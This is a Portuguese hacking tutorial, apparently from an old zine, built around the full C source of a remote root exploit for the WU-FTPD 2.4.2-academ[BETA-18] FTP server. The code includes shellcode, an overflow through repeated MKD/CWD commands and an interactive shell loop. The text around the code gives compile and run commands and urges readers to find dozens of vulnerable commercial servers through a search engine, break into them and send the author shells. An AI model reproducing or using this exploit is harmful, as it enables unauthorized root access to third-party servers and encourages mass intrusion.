Vamos aprender a hackear graças a um buffer overfolow no servidor de ftp
WU-2.4.2-ACADEM[BETA-18] (um dos mais encontrados).
Vc pode logar usando a opção de anonymous em um diretório com permissão de
escrita (+W) e cata um root com um overflow.

Encontrando servers

Bom, vc procura servidores com a porta de ftp ativa (21), dae da um
ftp.servidor.com.
Vai aparecer o nome do servidor, se for WU 2.4.2 eh paulada, facinhu de
hacka, se for otro tb eh facinhu (dependendo), mas vc num quer tudo de mão
bejada neh?
OK, testa a conta anonymous, se funcionar provavelmente vc vai cair no
diretorio /pub, massa!
Vamu hacka!

O Exploit

Bom, esse eh um exploit da ADM, eu coloquei ele pq eh de um bug muito
encontrado i eh facinhu de usa. :)

<++> xploits/wu.c

/* Inicio do wu.c

THIS IS PRIVATE! DO NOT DISTRIBUTE!!!! PRIVATE!

WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)
for linux x86 (redhat 5.2)

by duke
[email protected]

BIG thanks to stran9er for alot of help with part of the shellcode!
i fear stran9er, but who doesn't? !@$ :)

Greets to: #!ADM, el8.org users,

To exploit this remotely they need to have a directory you can
have write privlidges to.. this is the <dir> argument.. you can
also use this locally by specifying -l <ur login> <urpass> with the
<dir> = your home directory or something
-duke
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>

#define RET 0xbfffa80f

void logintoftp();
void sh();
void mkd(char *);
int max(int, int);

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
"\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
"\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
"\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03"
"\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
"\x80\xe8\xac\xff\xff\xff";

char tmp[256];
char name[128], pass[128];

int sockfd;

int main(int argc, char **argv)
{
char sendln[1024], recvln[4048], buf1[800], buf2[1000];
char *p, *q;
int len, offset = 0, i;
struct sockaddr_in cli;

if(argc < 3){
printf("usage: %s <host> <dir> [-l name pass] [offset]\n", argv[0]);
exit(0);
}
if(argc >= 4){
if(strcmp(argv[3], "-l") == 0){
strncpy(name, argv[4], 128);
strncpy(pass, argv[5], 128);
} else {
offset = atoi(argv[3]);
}
if(argc == 7)
offset = atoi(argv[6]);
}

if(name[0] == 0 && pass[0] == 0){
strcpy(name, "anonymous");
strcpy(pass, "[email protected]");
}

bzero(&cli, sizeof(cli));
bzero(recvln, sizeof(recvln));
bzero(sendln, sizeof(sendln));
cli.sin_family = AF_INET;
cli.sin_port = htons(21);
inet_pton(AF_INET, argv[1], &cli.sin_addr);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect");
exit(0);
}
while((len = read(sockfd, recvln, sizeof(recvln))) > 0){
recvln[len] = '\0';
if(strchr(recvln, '\n') != NULL)
break;
}
logintoftp(sockfd);
printf("logged in.\n");
bzero(sendln, sizeof(sendln));

for(i=0; i<996; i+=4)
*(long *)&buf2[i] = RET + offset;
memset(buf1, 0x90, 800);
memcpy(buf1, argv[2], strlen(argv[2]));
mkd(argv[2]);
p = &buf1[strlen(argv[2])];
q = &buf1[799];
*q = '\x0';
while(p <= q){
strncpy(tmp, p, 200);
mkd(tmp);
p+=200;
}
mkd(shellcode);
mkd("bin");
mkd("sh");
p = &buf2[0];
q = &buf2[999];
while(p <= q){
strncpy(tmp, p, 250);
mkd(tmp);
p+=250;
}
sh(sockfd);

close(sockfd);
printf("finit.\n");
}

void mkd(char *dir)
{
char snd[512], rcv[1024];
char blah[1024], *p;
int n;

bzero(blah, sizeof(blah));
p = blah;
for(n=0; n<strlen(dir); n++){
if(dir[n] == '\xff'){
*p = '\xff';
p++;
}
*p = dir[n];
p++;
}
sprintf(snd, "MKD %s\r\n", blah);
write(sockfd, snd, strlen(snd));
bzero(snd, sizeof(snd));
sprintf(snd, "CWD %s\r\n", blah);
write(sockfd, snd, strlen(snd));
bzero(rcv, sizeof(rcv));
while((n = read(sockfd, rcv, sizeof(rcv))) > 0){
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}
return;
}

void logintoftp()
{
char snd[1024], rcv[1024];
int n;

printf("logging in with %s: %s\n", name, pass);
memset(snd, '\0', 1024);
sprintf(snd, "USER %s\r\n", name);
write(sockfd, snd, strlen(snd));

while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}

memset(snd, '\0', 1024);
sprintf(snd, "PASS %s\r\n", pass);
write(sockfd, snd, strlen(snd));

while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}
return;
}

void sh()
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;

strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(sockfd, snd, strlen(snd));

for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &rset)){
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if(FD_ISSET(sockfd, &rset)){
bzero(rcv, sizeof(rcv));
if((n = read(sockfd, rcv, sizeof(rcv))) == 0){
printf("EOF.\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
}
fputs(rcv, stdout);
}
}
}

int max(int x, int y)
{
if(x > y)
return(x);
return(y);
}

<-->

Exploiting

OK, temos o server vulneravel e o exploit, vamos pegar um root.
Eh so vc seguir esses passos:
cc -o wu wu.c
./wuservidor /pub -l anonymous [email protected]

Dae vc cai numa shell root, facinho neh?
Bom, acho que eh isso, vai no Altavista e cata uma duzia de servidores .com
vulneraveis, hacka gringo rlz!
Dae c vc quiser manda uma shell pra eu, beleza....
hehehehe

Echo Off